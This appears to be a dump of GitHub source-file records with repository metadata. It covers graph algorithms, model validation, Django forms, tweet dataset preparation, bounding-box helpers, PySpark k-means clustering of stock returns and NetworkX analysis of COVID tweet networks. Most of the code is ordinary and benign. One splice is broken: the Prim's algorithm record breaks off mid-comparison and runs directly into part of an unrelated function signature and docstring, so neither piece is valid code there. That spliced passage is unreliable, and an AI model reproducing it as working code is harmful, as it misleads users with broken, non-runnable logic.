writer=PillowWriter(fps=24))\n\n#plt.show()\n\n\n\n#np.save('timeData',timeData)\n\n#a=[]\n#dataPts=np.array([2,3,4])\n#for k in range(938):\n# count=0 \n# for i in range(720):\n# for j in range(613):\n# if 0!=timeData[k,i,j]:\n# count+=1\n #np.append(dataPts,[k/12+1938,timeData[k,i,j]])\n# a.append(count)\n# if k%10==0:\n# print(k/10, end='\\r')\n#plt.plot(gaussian_filter1d(a, sigma=3))\n#plt.show() \n \n\n\n\n#for site in sitesRaw:\n# sp=site.split(\"\\t\")\n# idn=sp[0]\n# arr=np.array([])\n# if int(sites[idn][\"gw_count_nu\"])>200: \n \n # np.append(arr,[datetime.fromisoformat(dat[3]).timestamp()/31536000+1970,float(dat[6])])\n \n #y = gaussian_filter1d(lev, sigma=2)\n #plt.plot(dates,y)\n #plt.show()\n\n\n#print(sites['393309118515901']) \n\n\ndef isNumber(s):\n try:\n float(s) # for int, long and float\n except ValueError:\n try:\n complex(s) # for complex\n except ValueError:\n return False\n\n return True","repo_name":"benckeller/watervision","sub_path":"dataProcessing/waterVis.py","file_name":"waterVis.py","file_ext":"py","file_size_in_byte":5481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"6401847931","text":"from math import inf\n\ndef Prim(G,s):\n N = len(G)\n G.sort()\n maxx = max(max(G))\n n = maxx +1\n W = [inf for _ in range(n)]\n Parent = [None for _ in range(n)]\n Przetworzone = [False for _ in range(n)]\n W[s]=0\n Przetworzone[s] = True\n\n for i in range(len(Przetworzone)):\n for v in range(N):\n if G[v][0] == s:\n break\n cp = v\n while v < N and G[v][0] == s:\n w = v\n while w < N and G[w][0]==s:\n if Przetworzone[G[w][1]] == False and W[G[w][1]] > G[w][2]:\n W[G[w][1]]=G[w][2]\n w+=1\n v+=1\n minn = inf\n while cp < N and G[cp][0] == s:\n if Przetworzone[G[cp][1]] == False and W[G[cp][1]] tuple[float, Any]:\n \"\"\"\n Full validation process of a model for dataset with a ground truth, with custom splitting method,\n returns the percentage predicted correctly and a confusion matrix\n :param label_encoder: encoder for labels\n :param labels: list of labels\n :param default_activity: int representing encoded default activity\n :param data: pd.Dataframe with 'Start_Time', 'End_Time', 'Sensor' columns\n :param ground_truth: pd.Dataframe with 'Start_Time', 'End_Time', 'Activity' columns\n :param model: implementation of 
abstract commons.Model class\n    :param model_hyperparams: a dictionary of hyperparams for the model train function\n    :param window_length_seconds: length of window for windowing of data\n    :param window_slide_seconds: how much time in between each window, in seconds\n    :param split_method: any method that takes a list and returns a train, test split\n    :return the total average and a confusion matrix for the model\n    \"\"\"\n    # Window the data\n    windows = split_into_windows(data, ground_truth, default_activity, window_length_seconds,\n                                 window_slide_seconds)\n    # Split the windows into train and test\n    if split_method is not None:\n        train, test = split_method(windows)\n    else:  # Use default 60/40 split\n        random.shuffle(windows)\n        split_index = int(len(windows) * 0.6)\n\n        train = windows[:split_index]\n        test = windows[split_index:]\n\n    return validate(train, test, model, labels, label_encoder, model_hyperparams)\n\n\ndef validate(train: list[tuple[pd.DataFrame, int, pd.Timestamp, pd.Timestamp]],\n             test: list[tuple[pd.DataFrame, int, pd.Timestamp, pd.Timestamp]],\n             model: Model, labels: list[str], label_encoder: StringLabelEncoder,\n             model_hyperparams: dict | None = None) -> tuple[float, Any]:\n    \"\"\"\n    Validates a given model using a train and test list of windows, returns the percentage predicted\n    correctly and a confusion matrix\n    :param label_encoder: encoder for labels\n    :param labels: list of labels\n    :param train: tuple from window_splitter\n    :param test: tuple from window_splitter\n    :param model: implementation of abstract commons.Model class\n    :param model_hyperparams: a dictionary of hyperparams for the model train function\n    :return the total average and a confusion matrix for the model\n    \"\"\"\n    # Train the model\n    if model_hyperparams is None:\n        model_hyperparams = {}\n    model.train(train, **model_hyperparams)\n\n    # Predict activities for test data using model\n    score = 0\n    y_pred = []\n    y_true = []\n    for window in test:\n        truth_value = window[1]\n        prediction = model.predict(window[0])  # Assumes output of predict will be a string activity\n        y_pred.append(prediction)\n        y_true.append(truth_value)\n        # print('Predicted: ' + str(prediction))\n        # print('for actual: ' + str(truth_value))\n        if truth_value == prediction:\n            score += 1\n    average = score / len(test)\n    # labels = ['Sleeping', 'Meal_Preparation', 'Kitchen_Usage', 'Bathroom_Usage', 'Idle', 'Relax',\n    #           'Outside']\n    # print(len(y_true))\n    dy_true = [label_encoder.decode_label(y) for y in y_true]\n    dy_pred = [label_encoder.decode_label(y) for y in y_pred]\n    # print(len(y_pred))\n    cm = confusion_matrix(dy_true, dy_pred, labels=labels, normalize='true')\n    return average, cm\n","repo_name":"R3c5/Multi-Modal-Edge-AI","sub_path":"multi_modal_edge_ai/models/adl_inference/validating/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":4253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"32533740121","text":"print(\"Welcome to AEROMATIC\")\n\ni = 0\ncontinuar = True\n\nwhile continuar:\n    print(\"SQUARE\", i)\n    l = int(input(\"Side? \"))\n\n    if l == -1:\n        continuar = False\n    else:\n        a = l*l\n        print(\"Area\", a)\n        i += 1\n\nprint(\"Thank you for using AEROMATIC\")\n\n\n","repo_name":"jorgedg6/material-computacion","sub_path":"INTRO A PYTHON/Codigos/4. 
Iteraciones/areomatic32.py","file_name":"areomatic32.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"5816452906","text":"from django import forms\nfrom django.contrib.auth.models import User\nfrom . import models\nclass comment_form(forms.Form):\n comment=forms.CharField(required = True,max_length=400,widget=forms.Textarea\n (attrs={'class':'form-control ',\n\t\t\t\t 'id':'exampleFormControlTextarea1','rows':'1'}))\n\nclass note_form(forms.Form):\n note=forms.CharField(required = False,max_length=400,widget=forms.Textarea\n (attrs={'class':'form-control ',\n 'id':'exampleFormControlTextarea2','rows':'10'}))\n\n\nclass recipe_form(forms.ModelForm):\n class Meta():\n model = models.recipe\n fields = ('cuisine_name','name','ingredients','method','time','image')\n #exclude = ('cuisine_name')\n #comment=forms.CharField(max_length=400)\nclass recipe_edit_form(forms.ModelForm):\n class Meta():\n model = models.recipe\n fields = ('cuisine_name','name','ingredients','method','time')\n #exclude = ('cuisine_name')\n #comment=forms.CharField(max_length=400)\nclass search(forms.Form):\n txtSearch=forms.CharField(max_length=400)\n","repo_name":"Mayank-Bhatt-450/cookbook","sub_path":"recipes/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"7804744880","text":"import json\nimport os\nimport csv\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\nimport preprocessor as p\n\nwith open('rumoureval-2019-training-data/train-key.json') as json_file:\n train_key = json.load(json_file)\n\nwith open('rumoureval-2019-training-data/dev-key.json') as json_file:\n dev_key = json.load(json_file)\n\npath = \"rumoureval-2019-training-data/twitter-english\"\nmain_dir = os.listdir(path)\n\n\nlst_a = [\"support\", \"query\", \"deny\", \"comment\"]\nlst_b = [\"true\", \"false\", \"unverified\"]\n\nwith open('twitter_training_dataset.csv', 'a') as csvFile:\n writer = csv.writer(csvFile)\n header = ['type', 'id', 'text', 'favorite_count', 'retweet_count', 'label_a', 'label_b']\n writer.writerow(header)\n\n for dirs in main_dir:\n print(10 * \"- - \", dirs, 10 * \"- - \")\n dir = os.path.join(path, dirs)\n sub_dir = os.listdir(dir)\n for source_id in sub_dir:\n source_tweet = os.path.join(dir, source_id, \"source-tweet\", source_id + \".json\")\n with open(source_tweet) as json_file:\n data = json.load(json_file)\n\n task_a = \"\"\n task_b = \"\"\n\n for i in train_key['subtaskaenglish']:\n if i==str(source_id):\n task_a = lst_a.index(train_key['subtaskaenglish'][i])\n\n for i in train_key['subtaskbenglish']:\n if i==str(source_id):\n task_b = lst_b.index(train_key['subtaskbenglish'][i])\n\n if task_a==\"\":\n for i in dev_key['subtaskaenglish']:\n if i == str(source_id):\n task_a = lst_a.index(dev_key['subtaskaenglish'][i])\n\n for i in dev_key['subtaskbenglish']:\n if i == str(source_id):\n task_b = lst_b.index(dev_key['subtaskbenglish'][i])\n\n row = [\"source\", str(data['id']), p.clean(str(data['text'])), data['favorite_count'], data['retweet_count'], task_a, task_b]\n writer.writerow(row)\n\n replies = os.path.join(dir, source_id, \"replies\")\n replies_dir = os.listdir(replies)\n \n for reply in replies_dir:\n tweet = os.path.join(replies, reply)\n reply_id = str(reply)[:-5]\n\n task_a = \"\"\n task_b = \"\"\n\n for i in train_key['subtaskaenglish']:\n if i==str(reply_id):\n 
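# encode the annotated stance (support/query/deny/comment) as its index in lst_a\n                        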
task_a = lst_a.index(train_key['subtaskaenglish'][i])\n\n if task_a==\"\":\n for i in dev_key['subtaskaenglish']:\n if i == str(reply_id):\n task_a = lst_a.index(dev_key['subtaskaenglish'][i])\n\n with open(tweet) as json_file:\n data = json.load(json_file)\n row = [\"reply\", str(data['id']), p.clean(str(data['text'])), data['favorite_count'], data['retweet_count'], task_a, task_b]\n writer.writerow(row)\n","repo_name":"rajveerbeerda/RumourEval-2019","sub_path":"manipulating_dataset/twitter_training.py","file_name":"twitter_training.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"17300756835","text":"\"\"\"\nThis file contains basic functionality for the handling of bounding boxes.\n\"\"\"\nimport numpy as np\n\nfrom skimage.morphology import convex_hull_image\n\n\ndef bbox_center(bbox):\n \"\"\" Center of bounding box.\n\n Parameters:\n -----------\n bbox: tuple (y0, x0, h, w)\n\n Return:\n -------\n center: tuple (y, x)\n \"\"\"\n y, x, h, w = bbox\n return int(y + h/2), int(x + w/2)\n\n\ndef coords_to_bbox(coords):\n \"\"\" Bounding box of coords.\n\n Parameters:\n -----------\n coords: numpy array (n, 2)\n Coordinates.\n\n Return:\n -------\n bbox: tuple (y0, x0, h, w)\n \"\"\"\n min_y, min_x, max_y, max_x = coords[0].min(), coords[1].min(), coords[0].max(), coords[1].max()\n return min_y, min_x, max_y - min_y, max_x - min_x\n\n\ndef mask_to_bbox(mask, label=None):\n \"\"\" Bounding box of pixel mask.\n\n Parameters:\n -----------\n mask: numpy array\n Binary mask or label image.\n label: int (optional)\n Label if mask is label image.\n\n Return:\n -------\n bbox: tuple (y0, x0, h, w)\n \"\"\"\n mask = mask if label is None else mask == label\n coords = np.where(mask)\n return coords_to_bbox(coords)\n\n\ndef coords_to_chull(coords, shape):\n \"\"\" Convex hull of coords.\n\n Parameters:\n -----------\n coords: numpy array (n, 2)\n Coordinates.\n shape: array like (2,)\n Shape of image.\n\n Return:\n -------\n matrix: numpy array with input shape\n \"\"\"\n matrix = np.zeros(shape[:2], dtype='uint8')\n matrix[coords[:, 0], coords[:, 1]] = 1\n return convex_hull_image(matrix)\n\n\ndef iou(bboxa, bboxb):\n \"\"\" Intersection over union of bounding boxes bboxa and bboxb.\n\n Parameters:\n -----------\n bboxa: tuple (y0, x0, h, w)\n bboxb: tuple (y0, x0, h, w)\n\n Return:\n -------\n iou: float\n area(bboxa n bboxb)/area(bboxa u bboxb)\n \"\"\"\n yamin, xamin, ha, wa = bboxa\n ybmin, xbmin, hb, wb = bboxb\n yamax, xamax = yamin+ha, xamin+wa\n ybmax, xbmax = ybmin+hb, xbmin+wb\n xs, ys = max(xamin, xbmin), max(yamin, ybmin)\n xe, ye = min(xamax, xbmax), min(yamax, ybmax)\n areai = (xe-xs)*(ye-ys) if xe > xs and ye > ys else 0.0\n areau = ha*wa + hb*wb - areai\n return float(areai)/areau\n\n\ndef has_intersection(bboxa, bboxb):\n \"\"\" Returns True if bboxa has an intersection with bboxb.\n\n Parameters:\n -----------\n bboxa: tuple (y0, x0, h, w)\n bboxb: tuple (y0, x0, h, w)\n\n Return:\n -------\n iou: bool\n \"\"\"\n yamin, xamin, ha, wa = bboxa\n ybmin, xbmin, hb, wb = bboxb\n yamax, xamax = yamin+ha, xamin+wa\n ybmax, xbmax = ybmin+hb, xbmin+wb\n xs, ys = max(xamin, xbmin), max(yamin, ybmin)\n xe, ye = min(xamax, xbmax), min(yamax, ybmax)\n return xe > xs and ye > ys\n\n\ndef evaluate_object_category(ground_truth, prediction, min_iou=0.5):\n \"\"\"\n\n Parameters:\n -----------\n ground_truth: list of tuples (y0, x0, h, w) (bounding boxes)\n prediction: list of tuples (y0, x0, 
h, w) (bounding boxes)\n min_iou: float\n Intersection over union must be greater than min_iou.\n\n Return:\n -------\n (precision, recall, tp, fp) : float, float, int, int\n \"\"\"\n # edge cases\n if len(prediction) == 0 and len(ground_truth) > 0:\n return 0.0, 0.0, 0.0, 0.0\n if len(prediction) == 0 and len(ground_truth) == 0:\n return 1.0, 1.0, 0.0, 0.0\n if len(prediction) > 0 and len(ground_truth) == 0:\n return 0.0, 1.0, 0.0, len(prediction)\n\n # predictions that intersect with multiple objects are associated by greatest iou\n ious = [[iou(gt, p) for gt in ground_truth] for p in prediction]\n association = [max(enumerate(lst), key=lambda x:x[1]) for lst in ious] # generates (key, value) pairs\n\n # only predictions with iou > min_iou are associated\n association = [a if a[1] > min_iou else (-1, a[1]) for a in association]\n\n # only prediction with greatest iou is associated with the ground truth\n for gt in range(len(ground_truth)):\n indices = [(i, a[1]) for i, a in enumerate(association) if a[0] == gt]\n if len(indices) > 1:\n indices.pop(max(enumerate(indices), key=lambda x: x[1][1])[0])\n for elem in indices:\n association[elem[0]] = (-1, association[elem[0]][1])\n\n # return precision, recall, tp, fp\n tp = sum([1 for a in association if a[0] >= 0])\n return float(tp)/len(prediction), float(tp)/len(ground_truth), tp, len(prediction) - tp\n","repo_name":"wllhf/img_toolbox","sub_path":"bbox.py","file_name":"bbox.py","file_ext":"py","file_size_in_byte":4416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"69962323575","text":"from upload_to_gcp import Upload_To_GCP\nfrom read_data_source import Read_In_Data_Source\n\nfrom pyspark.sql import SparkSession, functions as F\nfrom pyspark.sql.functions import avg, variance, col\nfrom pyspark.sql.window import Window\nfrom pyspark.ml.feature import VectorAssembler, StandardScaler\nfrom pyspark.ml.clustering import KMeans\nfrom pyspark.ml.evaluation import ClusteringEvaluator\nfrom pyspark.ml.functions import vector_to_array\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom datetime import datetime\nimport re\n\n\nclass K_Means_Stocks_Clustering:\n def __init__(self):\n self.gcp_functions = Upload_To_GCP()\n self.read_in_data_source = Read_In_Data_Source()\n self.stock_df_clean = self.read_in_data_source.read_in_data_data_cleaning()\n\n\n def daily_returns_avg_var_cluster(self):\n self.k_means_log = \"\"\n number_of_clusters = 4\n\n k_means_set = self.stock_df_clean.select('Symbol', 'Date', 'daily_return', 'GICS Sector')\n cluster_set = k_means_set.groupBy('Symbol')\\\n .agg(F.round(avg('daily_return'), 4).alias('avg(daily_return)'), F.round(variance('daily_return'), 4).alias('variance(daily_return)'))\n\n assemble=VectorAssembler(inputCols=['avg(daily_return)', 'variance(daily_return)'], outputCol='features')\n assembled_data=assemble.transform(cluster_set)\n\n scale=StandardScaler(inputCol='features',outputCol='standardized')\n data_scale=scale.fit(assembled_data)\n data_scale_output=data_scale.transform(assembled_data)\n\n\n evaluator = ClusteringEvaluator(predictionCol='prediction', featuresCol='standardized', \\\n metricName='silhouette', distanceMeasure='squaredEuclidean')\n \n KMeans_algo=KMeans(featuresCol='standardized', k=number_of_clusters)\n KMeans_fit=KMeans_algo.fit(data_scale_output)\n output=KMeans_fit.transform(data_scale_output)\n score=evaluator.evaluate(output)\n\n self.k_means_log += f\"{datetime.now()}: \\nThe Number of 
Clusters is: {number_of_clusters}\\n\"\n self.k_means_log += f\"\\n{datetime.now()}: \\nThe Silhouette score is: {score}\\n\"\n self.gcp_functions.upload_string_message(bucket_name=\"stock-sp500\", contents=self.k_means_log, destination_blob_name=\"Clustering/k_means_log.txt\")\n \n cluster_df = output.withColumn(\"xs\", vector_to_array(\"standardized\")) \\\n .select(['Symbol','avg(daily_return)', 'variance(daily_return)', 'prediction'] + [col(\"xs\")[i] for i in range(2)])\n\n\n final_cluster_df = cluster_df.join(k_means_set, 'Symbol', how = 'left').\\\n select('Symbol', 'avg(daily_return)', 'variance(daily_return)', 'prediction','xs[0]','xs[1]', 'GICS Sector').\\\n distinct().toPandas()\n\n final_cluster_df.to_csv('gs://stock-sp500/Clustering/k_means_clustered_data.csv', index = False)\n\n final_cluster_df['prediction'] = final_cluster_df['prediction'].astype('str')\n final_cluster_df.rename({\"xs[0]\": \"daily_return_standardized\", \"xs[1]\": \"volume_standardized\"}, axis = \"columns\", inplace = True)\n\n new_final_cluster_df = final_cluster_df[final_cluster_df[\"variance(daily_return)\"]<=10]\n\n\n # Counts per Cluster\n counts_per_cluster = sns.countplot(x=\"prediction\", data=final_cluster_df, order=['0','1','2','3'])\n counts_per_cluster.bar_label(counts_per_cluster.containers[0])\n plt.title('Counts by Cluster')\n plt.savefig(\"counts_per_cluster.png\")\n\n # Uploading this figure up to GCP bucket\n self.gcp_functions.upload_filename(bucket_name=\"stock-sp500\", \n file_name= \"counts_per_cluster.png\", \n destination_blob_name=\"Clustering/counts_per_cluster.png\")\n\n\n fig, axs = plt.subplots(ncols=2, figsize=(15,5))\n all_data = sns.scatterplot(data=final_cluster_df, \n x=\"avg(daily_return)\", \n y=\"variance(daily_return)\", \n hue=\"prediction\",\n alpha=0.75,\n hue_order = ['0', '1', '2', '3'], ax=axs[0], legend = False)\n\n zoomed_in = sns.scatterplot(data=new_final_cluster_df, \n x=\"avg(daily_return)\", \n y=\"variance(daily_return)\", \n hue=\"prediction\",\n alpha=0.75,\n hue_order = ['0', '1', '2', '3'], ax=axs[1])\n axs[1].set_title('Zoomed In: K-Means Clusters')\n axs[0].set_title('All Data: K-Means Clusters')\n zoomed_in.legend(loc='center left', bbox_to_anchor=(1, 0.5), ncol=1, title = \"Cluster Group\")\n fig.tight_layout()\n plt.savefig(\"k_means_cluster.png\")\n\n # Uploading this figure up to GCP bucket\n self.gcp_functions.upload_filename(bucket_name=\"stock-sp500\", \n file_name= \"k_means_cluster.png\", \n destination_blob_name=\"Clustering/k_means_cluster.png\")\n\n \n # Average Daily Returns Histogram\n fig, axs = plt.subplots(ncols=2, figsize=(15,5))\n all_data_hist = sns.histplot(data=final_cluster_df, x=\"avg(daily_return)\", kde=True, ax=axs[0])\n zoomed_data_hist = sns.histplot(data=new_final_cluster_df, x=\"avg(daily_return)\", kde=True, ax=axs[1])\n axs[0].set_title('Average Daily Returns: All Data')\n axs[1].set_title('Average Daily Returns: Zoomed In')\n fig.tight_layout()\n plt.savefig(\"avg_dr_hist.png\")\n\n # Uploading this figure up to GCP bucket\n self.gcp_functions.upload_filename(bucket_name=\"stock-sp500\", \n file_name= \"avg_dr_hist.png\", \n destination_blob_name=\"Clustering/avg_dr_hist.png\")\n\n\n # Variance Daily Returns Histogram\n fig, axs = plt.subplots(ncols=2, figsize=(15,5))\n all_data_hist = sns.histplot(data=final_cluster_df, x=\"variance(daily_return)\", kde=True, ax=axs[0])\n zoomed_data_hist = sns.histplot(data=new_final_cluster_df, x=\"variance(daily_return)\", kde=True, ax=axs[1])\n axs[0].set_title('Variance 
Daily Returns: All Data')\n        axs[1].set_title('Variance Daily Returns: Zoomed In')\n        fig.tight_layout()\n        plt.savefig(\"var_dr_hist.png\")\n\n        # Uploading this figure up to GCP bucket\n        self.gcp_functions.upload_filename(bucket_name=\"stock-sp500\", \n                                           file_name= \"var_dr_hist.png\", \n                                           destination_blob_name=\"Clustering/var_dr_hist.png\")","repo_name":"carlosmonsivais123/PySpark-SP500-Portfolio-Optimization","sub_path":"PySpark_Clustering/k_means.py","file_name":"k_means.py","file_ext":"py","file_size_in_byte":6740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"6448627115","text":"import string\nimport os\nimport time\n\n\ncoords = [[7,1], [5,2], [4,4], [2,5], [4,6], [3,8]]\n\ndef set_poles ():\n    table = [['0']*9 for i in range(9)]\n    table[-1] = [0] + list(string.ascii_lowercase[:8])\n    for i in range(8):\n        table[i][0] = 8-i\n    return table\n\ndef print_table(table):\n    for i in table:\n        print(i)\n\ndef main():\n    global coords\n    table = set_poles()\n    table[coords[0][0]][coords[0][1]] = '1'\n    print_table(table)\n\nwhile len(coords) > 0:\n    os.system('clear')\n    main()\n    coords = coords[1::]\n    time.sleep(1)","repo_name":"HardreaM/euraz","sub_path":"Andrey Zybkov/f21.py","file_name":"f21.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"33033356337","text":"import networkx as nx\nimport matplotlib.pyplot as plt\nimport community\nimport collections\nimport numpy as np\nimport scipy as sp\nfrom collections import Counter\nfrom operator import itemgetter\nimport scipy.special\n\n# import the raw data\nData = open('ClaimRealCOVID-19_tweets_replies_5.csv', \"r\")\nnext(Data, None)  # skip the first line in the input file\nGraphtype = nx.DiGraph()\nG = nx.parse_edgelist(Data, delimiter=',', create_using=Graphtype, nodetype=int, data=(('weight', float),))\noriginal_nodes = list(G.nodes)\noriginal_edges = list(G.edges)\nprint(\"number of nodes \", len(original_nodes))\nprint(\"number of edges \", len(original_edges))\n# print(\"original_nodes\", original_nodes)\n# print(\"original_edges\", original_edges)\n# draw the original graph\ncolor_map = []\nfor node in G:\n    if node < 1000:\n        color_map.append('blue')  # news\n    elif node < 1000000:\n        color_map.append('red')  # articles\n    else:\n        color_map.append('#4a86e8')  # users\n# nx.draw(G, node_color=color_map, with_labels=False)\n# #pos = nx.spring_layout(G)\n# plt.show()\n\n# connected components\n# print(\"num of strongly cc \", nx.number_strongly_connected_components(G))\n# print(\"num of weakly cc \", nx.number_weakly_connected_components(G))\n# print(\"all the components\")\nb = sorted(nx.weakly_connected_components(G), key=len, reverse=True)\n# print(\"b\", len(b))\n\n# draw the largest connected component\n# largest = len(b[3])\n# print(\"largest connected components \", largest)\nNH = G.subgraph(b[0])\nnodes = list(NH.nodes)\nedges = list(NH.edges)\nprint(\"***********************\")\n# print(\"diameter\",nx.diameter(NH.to_undirected()))\n# print(\"average\",nx.average_shortest_path_length(NH))\n# print(\"largest connected components nodes\", len(nodes))\n# print(\"largest connected components edges\", len(edges))\ncolor_map = []\nfor node in NH:\n    if node < 1000:\n        color_map.append('blue')  # news\n    elif node < 1000000:\n        color_map.append('red')  # articles\n    else:\n        color_map.append('#4a86e8')  # users\n# nx.draw(NH, node_color=color_map, with_labels=False)\n# plt.show()\n\n######## degree histogram 
###################33\n\n# degree_sequence = sorted([d for n, d in G.degree()], reverse=True) # degree sequence\n# print(\"degree\",degree_sequence)\n# degreeCount = collections.Counter(degree_sequence)\n# deg, cnt = zip(*degreeCount.items())\n# fig, ax = plt.subplots()\n# plt.bar(deg, cnt, width=0.80, color=\"b\")\n# plt.title(\"Degree Histogram\")\n# plt.ylabel(\"Count\")\n# plt.yscale('log')\n# plt.xlabel(\"Degree\")\n# plt.xscale('log')\n# plt.yscale('log')\n# plt.show()\n\n# התפלגות דרגות\n# degree_sequence = sorted([d for n, d in NH.degree()], reverse=True) # degree sequence\n# print(\"degree\", degree_sequence)\n# degreeCount = collections.Counter(degree_sequence)\n# deg, cnt = zip(*degreeCount.items())\n# print(\"deg\",deg)\n# p = []\n# for x in cnt:\n# p.append(x / len(nodes))\n# print(\"cnt\", cnt)\n# print(\"probabily\", p)\n# fig, ax = plt.subplots()\n# plt.bar(deg, p, width=1, color=\"b\",edgecolor='black',)\n# plt.title(\"Degree Histogram\")\n# plt.ylabel(\"probability\")\n# plt.xlabel(\"Degree\")\n# plt.xscale('log')\n# plt.yscale('log')\n# # plt.xlim([0, 4000])\n# # plt.ylim([0, 1])\n# plt.show()\n\n# מדדי מרכזיות\n\n# print(\"degree centrality\", nx.degree_centrality(G))\n# print(nx.in_degree_centrality(G))\n# print(nx.out_degree_centrality(G))\n# print(\"betweenness\", nx.betweenness_centrality(G, k=100, normalized=True, weight=None, endpoints=False, seed=None))\n# print(\"pagerank\", nx.pagerank(G, alpha=0.8))\n# print(\"closeness\", nx.closeness_centrality(G))\n\n# degree_centrality=nx.degree_centrality(G)\n# a={k: v for k, v in sorted(degree_centrality.items(), key=lambda item: item[1], reverse=True)}\n# z=[]\n# for i in a.values():\n# z.append(i)\n#\n# Count = collections.Counter(z)\n# deg, cnt = zip(*Count.items())\n# print(\"deg\",deg)\n# p = []\n# for x in cnt:\n# p.append(x / len(nodes))\n# # print(\"cnt\", cnt)\n# # print(\"probabily\", p)\n# fig, ax = plt.subplots()\n# plt.bar(deg, cnt, width=1, color=\"b\",edgecolor='black',)\n# plt.title(\"Degree Histogram\")\n# plt.ylabel(\"cnt\")\n# plt.xlabel(\"Degree\")\n# plt.xlim([0,2])\n# plt.show()\n\n\n# plt.hist(deg, bins=np.logspace(np.log10(1), np.log10(1000), 100), density=True, edgecolor='black')\n# plt.gca().set_xscale(\"log\")\n# plt.gca().set_yscale(\"log\")\n# plt.show()\n# degree_centrality=nx.degree_centrality(G)\n# node_sizes=[]\n# for x in degree_centrality.values():\n# node_sizes.append(x*1000)\n#\n# in_degree=nx.in_degree_centrality(G)\n# node_sizes=[]\n# for x in in_degree.values():\n# node_sizes.append(x*1000)\n\n# out_degree=nx.out_degree_centrality(G)\n# node_sizes=[]\n# for x in out_degree.values():\n# node_sizes.append(x*1000)\n\n# betweenness=nx.betweenness_centrality(G, k=None, normalized=True, weight=None, endpoints=False, seed=None)\n# node_sizes=[]\n# for x in betweenness.values():\n# node_sizes.append(x*1000)\n\n# page_rank= nx.pagerank(G, alpha=0.8)\n# node_sizes=[]\n# for x in page_rank.values():\n# node_sizes.append(x*1000)\n\n\n# closeness=nx.closeness_centrality(G)\n# node_sizes=[]\n# for x in closeness.values():\n# node_sizes.append(x*1000)\n#\n\n# nx.draw(G, node_color=color_map,node_size=node_sizes, with_labels=False)\n# plt.show()\n\n\n# ניסוי יצירת גרף רק משתמשים 1\nDG = nx.DiGraph()\ncnt = 0\nonly_users = []\nonly_claims = []\nfor node in NH:\n if node > 1000 and node < 1000000:\n cnt = cnt + 1\n only_claims.append(node)\n elif node > 1000000:\n only_users.append(node) # users\n\n# print(\"articles\", cnt)\n# print(only_users)\n# 
print(only_claims)\n\nDG.add_nodes_from(only_users)\n\nfor l in only_claims:\n claims_out = list(NH.successors(l))\n claims_in = list(NH.predecessors(l))\n # print(\"for \",l , claims_out,claims_in)\n for x in claims_in:\n for y in claims_out:\n DG.add_edge(x, y)\n\n# nx.draw(DG, with_labels=False)\n# plt.show()\nprint(\"####################3\")\nprint(\"nodes:\", len(list(DG.nodes)), \"edges:\", len(list(DG.edges)))\n# print(\"diameter\",nx.diameter(DG.to_undirected()))\n# print(\"average\", nx.average_shortest_path_length(DG))\n\n# remove = [node for node, degree in dict(DG.degree()).items() if degree == 1084]\n# DG.remove_nodes_from(remove)\n# # remove = [node for node, degree in dict(DG.degree()).items() if degree > 400]\n# # DG.remove_nodes_from(remove)\n# remove = [node for node, degree in dict(DG.degree()).items() if degree == 125]\n# DG.remove_nodes_from(remove)\n# remove = [node for node, degree in dict(DG.degree()).items() if 100 > degree > 10]\n# DG.remove_nodes_from(remove)\n# # nx.draw(DG, with_labels=False)\n# # plt.show()\n# print(\"nodes:\", len(list(DG.nodes)), \"edges:\", len(list(DG.edges)))\n\n\n\n\n# התפלגות דרגות\ndegree_sequence = DG.in_degree()\nprint(degree_sequence)\ndegree_sequence = sorted([d for n, d in DG.in_degree()], reverse=True) # degree sequence\nprint(\"degree\", degree_sequence)\ndegreeCount = collections.Counter(degree_sequence)\ndeg, cnt = zip(*degreeCount.items())\n# print(\"deg\",deg)\n# # p = []\n# # for x in cnt:\n# # p.append(x / len(nodes))\nprint(\"cnt\", cnt)\n# # print(\"probabily\", p)\nfig, ax = plt.subplots()\nplt.bar(deg, cnt, width=1, color=\"b\")\nplt.title(\"Degree Histogram\")\nplt.ylabel(\"count\")\nplt.xlabel(\"Degree\")\nplt.xscale('log')\nplt.yscale('log')\nplt.show()\n\n#התפלגות עם נרמול של העמודות\nplt.hist(deg, bins=np.logspace(np.log10(1), np.log10(1000), 50), density=True, stacked=True, edgecolor='black')\nplt.gca().set_xscale(\"log\")\nplt.gca().set_yscale(\"log\")\nplt.show()\nx=np.array(deg)\ny=np.array(cnt)\n\n#Applying a linear fit with .polyfit()\nfit = np.polyfit(x,y,1)\nang_coeff = fit[0]\nintercept = fit[1]\nprint(fit)\nfit_eq = ang_coeff*x + intercept #obtaining the y axis values for the fitting function\nprint(fit_eq)\n#Plotting the data\nfig = plt.figure()\nax = fig.subplots()\nax.plot(x, fit_eq,color = 'r', alpha = 0.5, label = 'Linear fit')\nax.scatter(x,y,s = 5, color = 'b', label = 'Data points') #Original data points\nax.set_title('Linear fit ')\nax.legend()\n# plt.xscale('log')\n# plt.yscale('log')\nplt.show()\n\n\n\n# betweenness=nx.betweenness_centrality(DG, k=None, normalized=True, weight=None, endpoints=False, seed=None)\n# print(betweenness)\n# node_sizes=[]\n# for x in betweenness.values():\n# node_sizes.append(x*1000)\n# nx.draw(DG, node_color=color_map,node_size=node_sizes, with_labels=False)\n# plt.show()\n# print(sorted([d for n, d in DG.out_degree()], reverse=True))\npage_rank = nx.pagerank(DG, alpha=0.8)\na = dict(sorted(page_rank.items(), reverse=True, key=lambda item: item[1]))\nprint(\"page rank\", a)\n\ncloseness = nx.closeness_centrality(DG)\na = dict(sorted(closeness.items(), 